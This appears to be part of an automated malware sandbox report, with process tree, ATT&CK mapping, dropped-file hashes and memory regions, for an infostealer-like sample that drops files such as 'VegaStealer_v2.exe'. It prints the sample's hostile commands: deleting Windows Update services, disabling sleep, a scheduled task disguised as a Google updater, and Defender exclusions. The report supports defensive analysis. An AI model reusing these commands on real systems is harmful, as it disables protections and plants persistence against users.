  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:212
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2392
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4032
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2984
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4612
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2164
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4284
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:2604
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:4676
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4660
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4348
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:1940
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5076
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:380
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4064
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#dwcgfi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3152
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3676
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2228
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lnfpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#oeolwgmtv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2844
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:3472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tdoshlr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1436
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:2036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3644
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:3520
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2608
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4548
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2064
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4872
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2496
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:8
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:3820
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:4792
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:2684
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4512
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:868
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:3088
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:1796
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:3896
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:1048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#dwcgfi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3752
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe luagtubzbp
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:5040
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:2448
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:4272
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Detects videocard installed
    PID:4664
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe yssiiobibcfhxwow 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/zRLKpUXs5FnM1Cz+lDKtsCEDVmxImOWutHy/wWAAF6uYRISXHrJSUiB0oBkYNVSVc+Z5TfdaGGtLWt9rhn1IwMTF8FurdYcS6sHeOOKov7n8fO9XzXfUsz+ohQT/DgIOoi7fiA8i6cv/cRx4ZN8EFGNHCGIkSgLCP7XkZRNDA3AfMYAvttl72JY3UtD1wNsQ8uj8d62NlL+L8zrcALtZzZGNuWfQSVvacxTFdq3zX0xWi8V2W/cpkknQhjV9UiD3gnBlY8yLgnawpVicYVSXJJ8l8B6AiGAzD9a/lO2P+dKfayYNLUW8NsU90E4toTmbVEA1VIPg9Jl4Wv4UFV5fHvCdnDpZ3bVwRh3ONEG+6Re5TK8AVC0pmwo1lmntPFWCXSzNCbxka8rLN5HkqddA4H5oCoHd+wW9WbculhXO7kI69HC6zoL9AVQVS88WjnHcBQH44zacaVXShQRW+pQinFwgbcEXkJFJj8OPuqSb2/8=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3712

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1324

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2859723520e4b65c17cf8d7c60f73e20

SHA1
924815371b011d08a127d3fa101aac7e3565b500

SHA256
6cc32acefd76b1887a77fbaa397742ed12397d41daefdac36a36f2878639eb54

SHA512
577166a8d618424ef0408599804cf4b8e8bdf110460f6a6c4020734bb56bb103c11422ea01302852cc77e6910326ddb5b7cbba3f43868d7603bc01d0eae56ad6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a2b24af1492f112d2e53cb7415fda39f

SHA1
dbfcee57242a14b60997bd03379cc60198976d85

SHA256
fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

SHA512
9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\111.exe

Filesize
2.0MB

MD5
89b7a4a2bf16c095b67e35db192b7190

SHA1
786f90e2dd22f3f972f600f396347b991562a878

SHA256
45da036e33eb1ab99f7f2eed0206efdeab8f3c5f379926d97fb68e9b3604231a

SHA512
34991e536086714537f6b0d18fce83c85cce5eaa2f67b7a0eab0bf844901e963d410e0a62cf0aae77322a5a6a89ed23a286f08933286fe0ff79a9c6f8133bd76

Download Submit
C:\Users\Admin\AppData\Local\Temp\222.exe

Filesize
1.6MB

MD5
0cbe1bdba69acc4cdd0458a975634beb

SHA1
a1d308bd56f983948e5f071f877fdf3487772c5d

SHA256
88e00de72977efea45cd94dbd76460c2639326d85167130e30b14eff52c40cd0

SHA512
8b3fb7f4ab3c0702dcf11728bce1bbd2aeb85ee3f18db824d3e5683b28efd2126756347e0d24e5c9581d28415401f7a4b7f6ef67c4a186baed03fbdf82daceb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
571KB

MD5
169b6d383b7c650ab3ae2129397a6cf3

SHA1
fcaef7defb04301fd55fb1421bb15ef96d7040d6

SHA256
b896083feb2bdedc1568b62805dbd354c55e57f2d2469a52aec6c98f4ec2dedf

SHA512
7a7a7bdb508b8bf177249251c83b65a2ef4a5d8b29397cab130cb8444b23888678673a9a2e4b1c74cc095b358f923b9e7e5a91bfa8c240412d95765851f1dd87

Download Submit
C:\Users\Admin\AppData\Local\Temp\SQLite.Interop.dll

Filesize
1.3MB

MD5
0a1e95b0b1535203a1b8479dff2c03ff

SHA1
20c4b4406e8a3b1b35ca739ed59aa07ba867043d

SHA256
788d748b4d35dfd091626529457d91e9ebc8225746211086b14fb4a25785a51e

SHA512
854abcca8d807a98a9ad0ca5d2e55716c3ce26fae7ee4642796baf415c3cfad522b658963eafe504ecaed6c2ecdcdf332c9b01e43dfa342fcc5ca0fbedfe600e

Download Submit
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll

Filesize
410KB

MD5
056d3fcaf3b1d32ff25f513621e2a372

SHA1
851740bca46bab71d0b1d47e47f3eb8358cbee03

SHA256
66b64362664030bff1596cda2ec5bd5df48cc7c8313c32f771db4aa30a3f86f9

SHA512
ce47c581538f48a46d70279a62c702195beacbfafb48a5a862b3922625fe56f6887d1679c6d9366f946d3d2124cb31c2a3eacbbd14d601ea56e66575cdf46180

Download Submit
C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe

Filesize
7.7MB

MD5
9f4f298bcf1d208bd3ce3907cfb28480

SHA1
05c1cfde951306f8c6e9d484d3d88698c4419c62

SHA256
bf7057293d871cac087daab42daf22c1737a1df6adc7b7963989658f3b65f4cc

SHA512
4c763c3b6d4884f77083db5ccada59bc57803b3226294eff2ec3db8f2121ac01ee240b0e822cb090f5320ce40df545b477e323efabdbca31722731adc4b46806

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wtmzdpnp.en2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\v2.exe

Filesize
271KB

MD5
3f62213d184b639a0a62bcb1e65370a8

SHA1
bbf50b3c683550684cdb345d348e98fbe2fcafe0

SHA256
c692dfc29e70a17cabc19561e8e2662e1fe32fdba998a09fe1a8dc2b7e045b34

SHA512
0cd40d714e6a6ebd60cc0c8b0e339905a5f1198a474a531b1794fb562f27053f118718cc68b9652fef3411906f9d8ad22d0253af256fa1922133e9907298e803

Download Submit
C:\Users\Admin\AppData\Roaming\HBPwVHJFwRTBNLBVGLZCSNLK.Admin\Browsers\Firefox\Bookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\Users\Admin\AppData\Roaming\HBPwVHJFwRTBNLBVGLZCSNLK.Admin\Process.txt

Filesize
846B

MD5
f35d01108a29d5f6851c48aea648e12d

SHA1
47d4acc341b73abeb991befa58f4544559942c81

SHA256
1521ddfede5f5c0120cbea4ad1d9a8692f4c404683bae4c68dce5f7a4b1a3290

SHA512
d5b4eae099ad940cbe0ea1df65e1800632116aa765e16995aa06da8094d18700043f65290a2c370d09639853b0d7f1e25da2708e3628f6a0e2ff175a6e978e90

Download Submit
C:\Users\Admin\AppData\Roaming\HBPwVHJFwRTBNLBVGLZCSNLK.Admin\Process.txt

Filesize
1KB

MD5
60348d1af7f553f95acd603bff997ef0

SHA1
52bd23d305fa504ab1534c776f5e8a58fe6b5cc7

SHA256
2439453f047c343d9329b771719920956576e47c68a846c36738195cc4b9d412

SHA512
08d80fecbf34137ecd67d12a8bd6ef60f8e091d8adab011a75c32e5f1d83d99074f09fe9f0c8aa16ae69e19c450d5e8d3878a23ccabb686d7a5576e56b4e590c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
memory/860-225-0x00007FF6B8270000-0x00007FF6B8417000-memory.dmp

Filesize
1.7MB

Download
memory/860-273-0x00007FF6B8270000-0x00007FF6B8417000-memory.dmp

Filesize
1.7MB

Download
memory/1324-356-0x00007FF6BFA40000-0x00007FF6BFC51000-memory.dmp

Filesize
2.1MB

Download
memory/1324-350-0x00007FF6BFA40000-0x00007FF6BFC51000-memory.dmp

Filesize
2.1MB

Download
memory/1324-300-0x00007FF6BFA40000-0x00007FF6BFC51000-memory.dmp

Filesize
2.1MB

Download
memory/2412-226-0x000001CC9D600000-0x000001CC9D622000-memory.dmp

Filesize
136KB

Download
memory/2828-123-0x00000000064B0000-0x00000000064EC000-memory.dmp

Filesize
240KB

Download
memory/2828-128-0x0000000007410000-0x00000000075D2000-memory.dmp

Filesize
1.8MB

Download
memory/2828-59-0x000000007468E000-0x000000007468F000-memory.dmp

Filesize
4KB

Download
memory/2828-221-0x0000000007B50000-0x0000000007B6E000-memory.dmp

Filesize
120KB

Download
memory/2828-117-0x0000000005FD0000-0x0000000006324000-memory.dmp

Filesize
3.3MB

Download
memory/2828-124-0x0000000006450000-0x0000000006471000-memory.dmp

Filesize
132KB

Download
memory/2828-116-0x0000000005F60000-0x0000000005FC8000-memory.dmp

Filesize
416KB

Download
memory/2828-112-0x0000000005810000-0x0000000005832000-memory.dmp

Filesize
136KB

Download
memory/2828-111-0x00000000050C0000-0x0000000005110000-memory.dmp

Filesize
320KB

Download
memory/2828-118-0x0000000005EF0000-0x0000000005F3C000-memory.dmp

Filesize
304KB

Download
memory/2828-219-0x0000000007AE0000-0x0000000007B46000-memory.dmp

Filesize
408KB

Download
memory/2828-87-0x0000000005770000-0x0000000005802000-memory.dmp

Filesize
584KB

Download
memory/2828-60-0x00000000002E0000-0x000000000032A000-memory.dmp

Filesize
296KB

Download
memory/2828-132-0x0000000007B90000-0x0000000008134000-memory.dmp

Filesize
5.6MB

Download
memory/2828-81-0x00000000055D0000-0x0000000005662000-memory.dmp

Filesize
584KB

Download
memory/2828-220-0x0000000008550000-0x00000000085C6000-memory.dmp

Filesize
472KB

Download
memory/3644-325-0x00000226D8220000-0x00000226D8228000-memory.dmp

Filesize
32KB

Download
memory/3644-321-0x00000226D80C0000-0x00000226D80CA000-memory.dmp

Filesize
40KB

Download
memory/3644-323-0x00000226D8210000-0x00000226D821A000-memory.dmp

Filesize
40KB

Download
memory/3644-320-0x00000226D8000000-0x00000226D80B5000-memory.dmp

Filesize
724KB

Download
memory/3644-324-0x00000226D8270000-0x00000226D828A000-memory.dmp

Filesize
104KB

Download
memory/3644-326-0x00000226D8250000-0x00000226D8256000-memory.dmp

Filesize
24KB

Download
memory/3644-327-0x00000226D8260000-0x00000226D826A000-memory.dmp

Filesize
40KB

Download
memory/3644-322-0x00000226D8230000-0x00000226D824C000-memory.dmp

Filesize
112KB

Download
memory/3644-319-0x00000226D7FE0000-0x00000226D7FFC000-memory.dmp

Filesize
112KB

Download
memory/3712-365-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp

Filesize
8.0MB

Download
memory/3712-371-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp

Filesize
8.0MB

Download
memory/3712-355-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp

Filesize
8.0MB

Download
memory/3712-357-0x0000018F4A590000-0x0000018F4A5B0000-memory.dmp

Filesize
128KB

Download
memory/3712-367-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp

Filesize
8.0MB

Download
memory/3712-373-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp

Filesize
8.0MB

Download
memory/3712-363-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp

Filesize
8.0MB

Download
memory/3712-362-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp

Filesize
8.0MB

Download
memory/3712-375-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp

Filesize
8.0MB

Download
memory/3712-369-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp

Filesize
8.0MB

Download
memory/3736-34-0x0000000000400000-0x0000000000F77000-memory.dmp

Filesize
11.5MB

Download
memory/4552-276-0x00007FF79AB70000-0x00007FF79AD81000-memory.dmp

Filesize
2.1MB

Download
memory/4552-224-0x00007FF79AB70000-0x00007FF79AD81000-memory.dmp

Filesize
2.1MB

Download
memory/5040-368-0x00007FF6B5D60000-0x00007FF6B5D76000-memory.dmp

Filesize
88KB

Download
memory/5040-361-0x00007FF6B5D60000-0x00007FF6B5D76000-memory.dmp

Filesize
88KB

Download